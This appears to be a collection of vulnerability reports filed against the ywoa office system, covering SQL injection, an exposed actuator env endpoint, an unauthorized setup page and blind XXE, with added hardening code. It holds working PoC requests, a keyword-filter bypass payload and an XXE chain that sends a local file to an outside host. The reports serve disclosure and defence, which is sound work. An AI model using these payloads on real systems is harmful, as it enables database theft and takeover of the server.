cloudwebsoft / ywoa

YunWang OA collaborative office system: an enterprise-grade OA system (OA platform, OA office, OA collaboration) built on an expert-level workflow engine, with 15 years of development behind it and more than 1,000 customers served, offering a mature set of OA functions. It ships with its own low-code development platform so you can get started, implement and deliver quickly.

Home Page: http://partner.yimihome.com/static/index.html

License: Other

Java 29.44% JavaScript 53.87% HTML 5.40% Python 0.04% CSS 3.82% Shell 0.01% TeX 0.01% TypeScript 1.66% Vue 5.35% SCSS 0.35% Less 0.08%


ywoa's Issues

Cloud Network OA - backend /notice/list?what interface SQL injection vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: SQL injection
Vulnerability details:

  1. A global search for ${ shows that ${sql} is spliced into the query at com/cloudweb/oa/mapper/xml/OaNoticeMapper.xml:58, which can cause SQL injection. The splicing belongs to the selectNoticeList() statement, so next we locate that method.
  2. In the mapper layer, selectNoticeList() is declared in the OaNoticeMapper interface at com/cloudweb/oa/mapper/OaNoticeMapper.java:30. Next we look for where it is called.
  3. selectNoticeList() is called at com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:117, inside the listResult() method.
  4. In the controller layer, the SQL passed into listResult() at com/cloudweb/oa/controller/OaNoticeController.java:131 comes from getSqlList(). Next we analyse how the SQL in getSqlList() is built and which values get spliced into it.
  5. When op=search and the if condition boxed in brown in the screenshot holds, the unfiltered what parameter is spliced directly into the SQL statement, which triggers the SQL injection.
  6. PoC to trigger the vulnerability:
http://localhost:8096/oa/notice/list?op=search&what='and updatexml(1,concat(0x7e,user(),0x7e),1)-- -

Cloud Network OA - ENV information disclosure vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: ENV information leakage
Vulnerability details:

  1. In the configuration file c-core/src/main/resources/application.yml:40, the default configuration exposes the Spring Boot actuator env endpoint.
  2. PoC: requesting the route below returns sensitive information from the server without authorization.
http://localhost:8096/oa/setup/management/env

yimi YWOA < 6.1 frontend unauthorized SQL injection

Environment setup

http://partner.yimihome.com/static/index.html#/index/sys_env

The one-click installer starts it directly. Then log in with account admin and password 1111111. If login is refused with an "authorization expired" prompt, change the local system time.

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed, the source code can be downloaded from gitee:

https://gitee.com/bestfeng/yimioa

Download it, open it locally in IDEA and read the code statically.

[Frontend] < 6.1 version unauthorized SQL injection

Fuzzing the interfaces with apikit turned up an endpoint that accepts unauthorized requests; the corresponding implementation method is then located in the code.
Prerequisite: this bug has a condition, namely the version must be below 6.1. For the reason why, look directly at the code in src/main/java/com/cloudweb/oa/controller/ApplicationController.java

The part above does not matter; pay attention to the if(isValid) below.

First the version is read from the configuration.

It reads version 6.1, then the version checks begin.

Check whether it is less than 3.

Check whether it is less than 4.

Check whether it is less than 5.

Check whether it is equal to 6.

The condition needed here is that the version must be <= 6 for this to succeed, so change the version.

One more place also needs changing: the version stored in the database, otherwise login reports that the versions are inconsistent. The class that compares the database version with the configuration-file version is src/main/java/com/cloudweb/oa/service/LoginService.java

Just change the value of the version field in the oa_sys_ver table in the database.

Restart Tomcat after the change, then request the endpoint below without logging in:

POST /oa/setup/checkPool?database=test' HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

The response here actually contains output: it reports a SQL statement error.

Here we extract the user directly with extractvalue.

PoC

and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+

HTTP

POST /oa/setup/checkPool?database=test'and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+ HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

Cloud Network OA - unauthorized modification of administrator password vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: unauthorized access
Vulnerability details:

  1. A global search for the http.authorizeRequests keyword shows, in the Spring Security configuration com/cloudweb/oa/config/WebSecurityConfig.java:187, that any user may access the files under the /setup/** directory.
  2. The files under /setup/** are used to set the database connection address. Since they are reachable without authorization, the existing database can be reset in order to change the administrator password.
  3. PoC: open the route below, reset the database connection address, and then reset the backend administrator password.
http://localhost:8096/oa/setup/setup.jsp
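
The two reports above (the /setup/** rule at WebSecurityConfig.java:187 and the actuator env endpoint reachable at /oa/setup/management/env) point at the same configuration layer. The following is an added example of how that rule set could be tightened; it is not ywoa's code. It assumes Spring Security 5.x in the WebSecurityConfigurerAdapter style implied by the http.authorizeRequests keyword, that the actuator base path is /setup/management as the PoC URL suggests, an ADMIN role name, and /login and /static/** as the public paths; all of those are assumptions, as is the package name.

```java
package example.config;  // hypothetical package, not part of ywoa

import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;

/**
 * Added example: replaces a blanket "/setup/**" permitAll with rules that keep the
 * installer and the actuator off the unauthenticated surface. Spring Security evaluates
 * antMatchers in order and stops at the first match, so the narrow rules come first.
 */
@Configuration
@EnableWebSecurity
public class HardenedWebSecurityConfig extends WebSecurityConfigurerAdapter {

    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http
            .authorizeRequests()
                // Assumed actuator base path (taken from the PoC URL). Management endpoints
                // are not served to browsers at all; operators read them from localhost or
                // from a separate management port instead.
                .antMatchers("/setup/management/**").denyAll()
                // The installer rewrites the datasource and the admin password; only an
                // authenticated ADMIN may reach it, and it should be removed after install.
                .antMatchers("/setup/**").hasRole("ADMIN")
                // The WeChat callback must stay reachable for the third party, so it is
                // matched exactly rather than with a wildcard that later servlets could share.
                .antMatchers("/servlet/WXCallBack").permitAll()
                // Assumed public paths: the login page and static assets.
                .antMatchers("/login", "/static/**").permitAll()
                .anyRequest().authenticated()
            .and()
            .formLogin();
    }
}
```

With this in place the setup.jsp PoC is answered by the login page rather than the installer. The actuator exposure should also be narrowed independently of the security filter, in application.yml, by setting management.endpoints.web.exposure.include to health, so that env is never served even if a later rule reopens the path.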

Unauthorized XXE vulnerability in the Yunwang OA /servlet/WXCallBack interface

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: unauthorized XXE
Vulnerability details:

  1. A global search for the newDocumentBuilder keyword finds db.parse(is); called at c-main/src/main/java/com/redmoon/weixin/aes/XMLParse.java:42 to parse XML data, with no restrictions applied during parsing. As long as the xmltext parameter is controllable, this yields an XXE file-read vulnerability.
  2. Following the extract() method, it is called at c-main/src/main/java/com/redmoon/weixin/aes/WXBizMsgCrypt.java:248, where the postData parameter is controllable.
  3. Following the DecryptMsg() method, it is called at c-main/src/main/java/com/redmoon/weixin/servlet/WXCallBackServlet.java:103, where the _postData parameter is assigned from the request data.
  4. During debugging it turned out that if the statement at c-main/src/main/java/com/redmoon/weixin/servlet/WXCallBackServlet.java:102 throws, execution never reaches the next line, so that statement must run correctly. From the analysis of the WXBizMsgCrypt() constructor, it is enough for the encodingAesKey variable to be 43 characters long to avoid the error.
  5. Configure this manually after logging into the backend: WeChat configuration -> enable Enterprise WeChat -> set the AESKey length to 43.
  6. The c-core/com/cloudweb/oa/config/WebSecurityConfig.java:189 configuration exempts the /servlet/WXCallBack path from permission checks, so the vulnerability is reachable without authorization.
  7. Construct the PoC. There is no echo here, so only blind XXE can be used to exfiltrate data out of band. Newer JDKs can only read single-line files; with 7u141 < jdk < 8u162 the ftp protocol can be used to read complete files.
POST /oa/servlet/WXCallBack HTTP/1.1
Host: localhost:8096
Content-Type: application/xml
Content-Length: 135

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE ANY [<!ENTITY % remote SYSTEM "http://172.16.13.19:1888/evil.dtd">%remote;%int;%send;]>

evil.dtd, served from 172.16.13.19:1888:
<!ENTITY % file SYSTEM "file:///Users/admin/Desktop/test/flag.txt">
<!ENTITY % int "<!ENTITY &#x25; send SYSTEM 'http://172.16.13.19:88/?p=%file;'>">
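
For the parser at XMLParse.java:42 the hardening belongs on the DocumentBuilderFactory, not on the input. The block below is an added example, not ywoa's code: it builds a factory that rejects any DOCTYPE, so neither the remote parameter entity nor the file entity of the PoC can even be declared, and runs a constructed benign document and a constructed hostile one through it. The feature URIs are the standard JAXP/Xerces ones that the JDK's built-in parser supports; the sample XML, the placeholder host and the package name are assumptions.

```java
package example.xml;  // hypothetical package, not part of ywoa

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

/** Added example: a DocumentBuilder that cannot be used for XXE, beside the default one. */
public final class SafeXmlParse {

    /** The permissive default, equivalent to the newDocumentBuilder() call the report found. */
    public static DocumentBuilder defaultBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    /** DTDs refused outright; the remaining settings are defence in depth for other parsers. */
    public static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // No DOCTYPE at all: neither the remote parameter entity nor the file entity
        // of the PoC can be declared, and entity-expansion bombs are impossible too.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // If a vendor parser ignored the feature above, still never fetch anything external.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    public static Document parse(DocumentBuilder builder, String xml) throws Exception {
        return builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: a WeChat-style callback body, and the same body with the
        // report's DOCTYPE prologue in front of it (host and port are placeholders).
        String benign = "<xml><Encrypt>ciphertext</Encrypt></xml>";
        String hostile = "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
                + "<!DOCTYPE ANY [<!ENTITY % remote SYSTEM \"http://127.0.0.1:1888/evil.dtd\">"
                + "%remote;%int;%send;]>"
                + benign;

        DocumentBuilder safe = hardenedBuilder();
        System.out.println("benign root: " + parse(safe, benign).getDocumentElement().getTagName());
        try {
            parse(safe, hostile);
            System.out.println("hostile parsed (should not happen)");
        } catch (SAXParseException e) {
            // The parser stops at the DOCTYPE before any entity is resolved.
            System.out.println("hostile rejected: " + e.getMessage());
        }
    }
}
```

defaultBuilder() is kept only for comparison and is deliberately not called on the hostile sample in main(), because a permissive builder would try to fetch the DTD from the placeholder host. The same factory settings apply to the SAX and StAX factories if other parts of the WeChat code path use those instead of DOM.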

Cloud Network OA - backend /user/list?isValid interface SQL injection vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: SQL injection
Vulnerability details:

  1. A global search for ${ shows that ${sql} is spliced into the query at com/cloudweb/oa/mapper/xml/UserMapper.xml:98, which can cause SQL injection. The statement belongs to listNameBySql(), so next we find where that method is defined.
  2. In the mapper layer, listNameBySql() is declared at com/cloudweb/oa/mapper/UserMapper.java:31. Next we analyse where it is called.
  3. Further up, the mapper's listNameBySql() is called at com/cloudweb/oa/service/impl/UserServiceImpl.java:824, where the service's listNameBySql() simply returns its result. Next we find where the service method is called.
  4. In the controller layer, listNameBySql() is called at com/cloudweb/oa/controller/UserController.java:876. Next we analyse which parameters can control the SQL statement.
  5. At com/cloudweb/oa/controller/UserController.java:809, when the condition op=search&deptcode=root is met, the isValid parameter is concatenated into ${sql}, triggering the SQL injection.
  6. PoC to trigger the vulnerability:
POST /oa/user/list HTTP/1.1
Host: localhost:8096
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Cookie: XXX
Connection: close
Content-Type: application/x-www-form-urlencoded

op=search&deptcode=root&isValid=1+order+by+u.orders+desc,regDate+desc)+tmp_count+where+1+=+1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+-+order+by+u.orders+desc,regDate+desc)+tmp_count

Cloud Network OA - backend /address/list?sort interface SQL injection vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: SQL injection
Vulnerability details:

  1. A global search for ${ shows that ${sql} is used at com/cloudweb/oa/mapper/xml/AddressDao.xml:123 to concatenate the SQL query, so if the sql variable is controllable there is a SQL injection vulnerability.
  2. Following up, the selectList() method is declared at com/cloudweb/oa/dao/AddressDao.java:30.
  3. One level up, selectList() is called at com/cloudweb/oa/service/AddressService.java:132, inside listResult(). Next we look for where listResult() is called.
  4. One level up again, listResult() is called at com/cloudweb/oa/controller/AddressController.java:362, and the sql variable is controllable.
  5. As the screenshot shows, the sql variable is produced by getSql(). Following getSql(), the sort parameter is spliced directly into the sql variable without any filtering at com/cloudweb/oa/service/AddressService.java:227, so controlling the sort parameter triggers the SQL injection.
  6. Finally, back in the controller layer, com/cloudweb/oa/controller/AddressController.java:355 shows that the sort parameter reaches the backend code through the /address/list route.
  7. PoC; you must be logged into the backend to trigger the SQL injection:
http://localhost:8096/oa/address/list?sort=desc)/**/tmp_count/**/where/**/1=1/**/and/**/updatexml/**/(1,concat(0x7e,user(),0x7e),1)--+-

Cloud Network OA - backend /user/list?sort interface SQL injection vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: SQL injection
Vulnerability details:

  1. A global search for ${ shows that ${sql} is spliced into the query at com/cloudweb/oa/mapper/xml/UserMapper.xml:98, which can cause SQL injection. The statement belongs to listNameBySql(), so next we find where that method is defined.
  2. In the mapper layer, listNameBySql() is declared at com/cloudweb/oa/mapper/UserMapper.java:31. Next we analyse where it is called.
  3. Further up, the mapper's listNameBySql() is called at com/cloudweb/oa/service/impl/UserServiceImpl.java:824, where the service's listNameBySql() simply returns its result. Next we find where the service method is called.
  4. In the controller layer, listNameBySql() is called at com/cloudweb/oa/controller/UserController.java:876. Next we analyse which parameters can control the SQL statement.
  5. At com/cloudweb/oa/controller/UserController.java:866, the sort parameter is concatenated into ${sql}, triggering the SQL injection.
  6. PoC to trigger the vulnerability:
POST /oa/user/list HTTP/1.1
Host: localhost:8096
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Cookie: skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; JSESSIONID=41C4A4D2B2C7E6462A06E98149A74AD4; remember-me=YWRtaW46MTcwNzI4ODk5NDEzMDo3ZTVmMTUxMGNkMmUwNWU5MjkwNWE1MjYwMGFiNTE5ZA
Connection: close
Content-Type: application/x-www-form-urlencoded

sort=)+tmp_count+WHERE+1+=+1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+-

Yunwang OA - backend /user/list?orderBy interface SQL injection vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: SQL injection
Vulnerability details:

  1. A global search for ${ shows that ${sql} is spliced into the query at com/cloudweb/oa/mapper/xml/UserMapper.xml:98, which can cause SQL injection. The statement belongs to listNameBySql(), so next we find where that method is defined.
  2. In the mapper layer, listNameBySql() is declared at com/cloudweb/oa/mapper/UserMapper.java:31. Next we analyse where it is called.
  3. Further up, the mapper's listNameBySql() is called at com/cloudweb/oa/service/impl/UserServiceImpl.java:824, where the service's listNameBySql() simply returns its result. Next we find where the service method is called.
  4. In the controller layer, listNameBySql() is called at com/cloudweb/oa/controller/UserController.java:876. Next we analyse which parameters can control the SQL statement.
  5. At com/cloudweb/oa/controller/UserController.java:866, the orderBy parameter is concatenated into ${sql}, triggering the SQL injection.
  6. PoC to trigger the vulnerability:
POST /oa/user/list HTTP/1.1
Host: localhost:8096
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Cookie: skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; JSESSIONID=41C4A4D2B2C7E6462A06E98149A74AD4; remember-me=YWRtaW46MTcwNzI4ODk5NDEzMDo3ZTVmMTUxMGNkMmUwNWU5MjkwNWE1MjYwMGFiNTE5ZA
Connection: close
Content-Type: application/x-www-form-urlencoded

orderBy=1+desc)+tmp_count+where+1=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+-

Yunwang OA - backend /notice/list?orderBy interface SQL injection vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: SQL injection
Vulnerability details:

  1. A global search for ${ shows that ${sql} is spliced into the query at com/cloudweb/oa/mapper/xml/OaNoticeMapper.xml:58, which can cause SQL injection. The splicing belongs to the selectNoticeList() statement, so next we locate that method.
  2. In the mapper layer, selectNoticeList() is declared in the OaNoticeMapper interface at com/cloudweb/oa/mapper/OaNoticeMapper.java:30. Next we look for where it is called.
  3. selectNoticeList() is called at com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:117, inside the listResult() method.
  4. In the controller layer, the SQL passed into listResult() at com/cloudweb/oa/controller/OaNoticeController.java:131 comes from getSqlList(). Next we analyse how the SQL in getSqlList() is built and which values get spliced into it.
  5. The orderBy parameter value is spliced directly into ${sql} without any filtering at com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:109, triggering the SQL injection.
  6. PoC to trigger the vulnerability:
http://localhost:8096/oa/notice/list?orderBy=1 desc) tmp_cunto where 1=1 and updatexml(1,concat(0x7e,user(),0x7e),1)-- -

Cloud Network OA - backend /notice/list?sort interface SQL injection vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: SQL injection
Vulnerability details:

  1. A global search for ${ shows that ${sql} is spliced into the query at com/cloudweb/oa/mapper/xml/OaNoticeMapper.xml:58, which can cause SQL injection. The splicing belongs to the selectNoticeList() statement, so next we locate that method.
  2. In the mapper layer, selectNoticeList() is declared in the OaNoticeMapper interface at com/cloudweb/oa/mapper/OaNoticeMapper.java:30. Next we look for where it is called.
  3. selectNoticeList() is called at com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:117, inside the listResult() method.
  4. In the controller layer, the SQL passed into listResult() at com/cloudweb/oa/controller/OaNoticeController.java:131 comes from getSqlList(). Next we analyse how the SQL in getSqlList() is built and which parameters get spliced into it.
  5. The sort parameter passed in the URL is spliced directly into the SQL statement without filtering, triggering the SQL injection.
  6. PoC to trigger the vulnerability:
http://localhost:8096/oa/notice/list?sort=) tmp_cunto where 1=1 and updatexml(1,concat(0x7e,user(),0x7e),1)-- -

ywoa SQL injection bypass and analysis article

ywoaSQL-Inject-Bypass

Environment build

Windows build

The Windows build is recommended: building in IDEA is troublesome and reports many errors, while Windows is a one-click deployment.

http://partner.yimihome.com/static/index.html#/index/sys_env

1. Personnel - Personnel information - orderBy GET parameter SQL injection

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Bypass payload

id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)

Environment build

Windows build

One-click installation; after installation it prompts that the system has expired, so go to setup and take a look.

It is valid until June 1, but that is fine; just change the system time here.

Login successful.

Code audit

1. Personnel - Personnel information - orderBy GET parameter SQL injection


POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 192.168.0.35:9888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.35:9888/oa/swagger-ui.html
Origin: http://192.168.0.35:9888
Connection: close
Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 137

page=1&limit=20&realname_cond=0&realname=test18&sex=&sex_cond=1&dept=&dept_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode=

SQL injection bypass

The injection payload above is:

id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)

The environment here was built from IDEA, but IDEA reports many errors and many functions are unavailable, so I switched to the Windows one-click deployment.

After building it, debug it remotely with IDEA.

When you try to reproduce this vulnerability again, you are prompted with an XSS interception.

I was curious at the time why this was intercepted as XSS and not as SQL injection, so let's look at the code.

The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic there.

Briefly, it gets the values of the request parameters and then passes them one by one to the detection logic below.

Since we were just prompted about an XSS attack, follow directly into the antixss method to see its implementation.
Next you arrive at AntiXSS.java

src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java

The antiXSS method is called with the html to be checked and a true.

Follow it in directly.

Look at the _antiXSS method, where content is the content to be checked.

Here is the specific detection logic, but I only look at the stripScriptTag method, because the detection happens inside this method and our only concern is which parameters are detected.

It mainly works with regular expressions, case-insensitive because of CASE_INSENSITIVE.

Scrolling down you can see that the and and sleep keywords are in fact filtered; create a new test class and tweak it to find out.

Remove AND:

The statement passes normally. Put AND back and remove sleep: the statement passes normally. Since this is the case, replacing and with && works.

The statement returns normally; then, after returning from here,

back in SecurityUtil.java it enters the SQL injection logic; follow the isValidSqlParam method.

Follow the sql_inj method.

We have already bypassed the detection of and; now the code logic in the second box needs bypassing.

The main logic here splits inj_str on |, producing the list inj_stra[], then iterates over the list; each loop uses indexOf to determine whether the value inj_stra[i] is in str, i.e. if indexOf returns > 0 the value exists, otherwise it does not. You can also write a class to step through this.

In the sixth loop select is detected, so obviously select needs bypassing.
Here I was going to try:

&& extractvalue(1,concat('~',database()))

Unfortunately, '~' is detected as XSS, so this does not work.

The && here must be URL-encoded, otherwise the request returns 400.

So we have to find a way around the select keyword; here is a payload that bypasses it:

id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)


Tip: just looking at the screenshot you might think SELECT in uppercase bypasses it, but in fact the value is converted to lowercase before sql_inj is called,

so capitalisation cannot bypass it.

Function implementation entry point

First it gets the GET parameter code; if code is empty it takes the GET parameter moduleCode and assigns it to code, and if moduleCode is absent it takes formCode and assigns that to code. Here the code parameter passed in is personbasic.

Continue to the next page.

Here is the OA developer's own implementation of the SQLBuilder class.

Follow this method.

Following into the getModuleListSqlAndUrlStr method, a sql string is returned; continuing down is the place that causes the SQL injection.

Follow into this listResult method.

The statements are then assembled in the middle.

Then executeQuery runs the statement.

The difference between the two SQL statements above is that one has the count spliced in and the other is the original that was passed in.

Then it returns; execution here waits 5 seconds, which confirms the injection.
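
The post reverse-engineers the filter by writing a small test class. The block below is an added example of that kind of harness, not ywoa's SecurityUtil or AntiXSS code: it runs the post's three orderBy payloads through a filter twice, once in the raw query-string form and once after URL decoding. The filter inside it is a stand-in built only from the post's description (an XSS regex first, then lowercase the value, split a '|' list and indexOf each entry); the word list and the regex are assumptions, the regex being chosen so that it reproduces the post's three experiments (AND alone passes, sleep alone passes, AND together with sleep is caught). The post does not say which representation the real filter inspects; since the servlet container has already turned %53 into S by the time getParameter() returns, the %53 trick can only help if the check runs on the undecoded string, and the harness makes that difference visible. Java 11+ and the package name are assumptions.

```java
package example.waf;  // hypothetical package, not part of ywoa

import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.Predicate;
import java.util.regex.Pattern;

/** Added example: a harness that checks a request filter on raw and on decoded input. */
public final class FilterHarness {

    // Assumed stand-in for the AntiXSS stage. Chosen to match the post's experiments:
    // dropping AND passes, dropping sleep passes, AND together with sleep is caught.
    static final Pattern XSS_STAGE =
            Pattern.compile("\\band\\b.*\\bsleep\\b", Pattern.CASE_INSENSITIVE | Pattern.DOTALL);

    // Assumed stand-in for inj_str; the post only states that "select" is reached in
    // the sixth iteration and that the value is lowercased before the loop.
    static final String INJ_STR = "'|exec|insert|delete|update|select|union|--";

    /** Model of the two-stage check described in the post: XSS regex, then keyword list. */
    public static boolean modelFilter(String value) {
        if (XSS_STAGE.matcher(value).find()) {
            return true;
        }
        String lower = value.toLowerCase();
        for (String keyword : INJ_STR.split("\\|")) {
            if (lower.indexOf(keyword) >= 0) {
                return true;
            }
        }
        return false;
    }

    /**
     * Runs every payload through the filter twice: as it appears in the query string, and
     * after the URL decoding the container performs before getParameter() returns.
     */
    public static Map<String, String> evaluate(Predicate<String> filter, Map<String, String> payloads) {
        Map<String, String> report = new LinkedHashMap<>();
        payloads.forEach((name, raw) -> {
            String decoded = URLDecoder.decode(raw, StandardCharsets.UTF_8);
            report.put(name, "raw=" + verdict(filter.test(raw))
                    + " decoded=" + verdict(filter.test(decoded)));
        });
        return report;
    }

    private static String verdict(boolean blocked) {
        return blocked ? "blocked" : "PASS";
    }

    public static void main(String[] args) {
        // The three orderBy values from the post, in query-string form.
        Map<String, String> payloads = new LinkedHashMap<>();
        payloads.put("plain",      "id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)");
        payloads.put("ampersand",  "id+%26%26+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)");
        payloads.put("versioncmt", "id+%26%26+(/*!%53eLEct*/+1+FROM+(/*!%53eLEct*/(sleep(5)))a)");
        evaluate(FilterHarness::modelFilter, payloads)
                .forEach((name, result) -> System.out.println(name + ": " + result));
    }
}
```

With the stand-in filter, plain and ampersand are blocked in both columns, while versioncmt passes on the raw form and is blocked on the decoded form. That asymmetry is the whole bypass: a keyword check applied to the undecoded string is defeated by encoding a single character, and one applied after decoding is defeated by the next syntax the word list does not know (MySQL executes the contents of /*!...*/ as SQL, other engines treat it as a comment). Either way the durable fix is validating the decoded orderBy value against an allowlist of column names, not lengthening inj_str.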

Cloud Network OA - backend /notice/list?cond interface SQL injection vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: SQL injection
Vulnerability details:

  1. A global search for ${ shows that ${sql} is spliced into the query at com/cloudweb/oa/mapper/xml/OaNoticeMapper.xml:58, which can cause SQL injection. The splicing belongs to the selectNoticeList() statement, so next we locate that method.
  2. In the mapper layer, selectNoticeList() is declared in the OaNoticeMapper interface at com/cloudweb/oa/mapper/OaNoticeMapper.java:30. Next we look for where it is called.
  3. selectNoticeList() is called at com/cloudweb/oa/service/impl/OaNoticeServiceImpl.java:117, inside the listResult() method.
  4. In the controller layer, the SQL passed into listResult() at com/cloudweb/oa/controller/OaNoticeController.java:131 comes from getSqlList(). Next we analyse how the SQL in getSqlList() is built and which values get spliced into it.
  5. When op=search and the if condition boxed in brown in the screenshot holds, the unfiltered cond parameter is spliced directly into the SQL statement, triggering the SQL injection.
  6. PoC to trigger the vulnerability:
http://localhost:8096/oa/notice/list?op=search&what=a&cond= updatexml(1, concat(0x7e, user(), 0x7e), 1)-- -

Cloud Network OA - backend /address/list?orderBy interface SQL injection vulnerability

Vulnerability product: ywoa
Vulnerability version: before 2024.07.04
Vulnerability type: SQL injection
Vulnerability details:

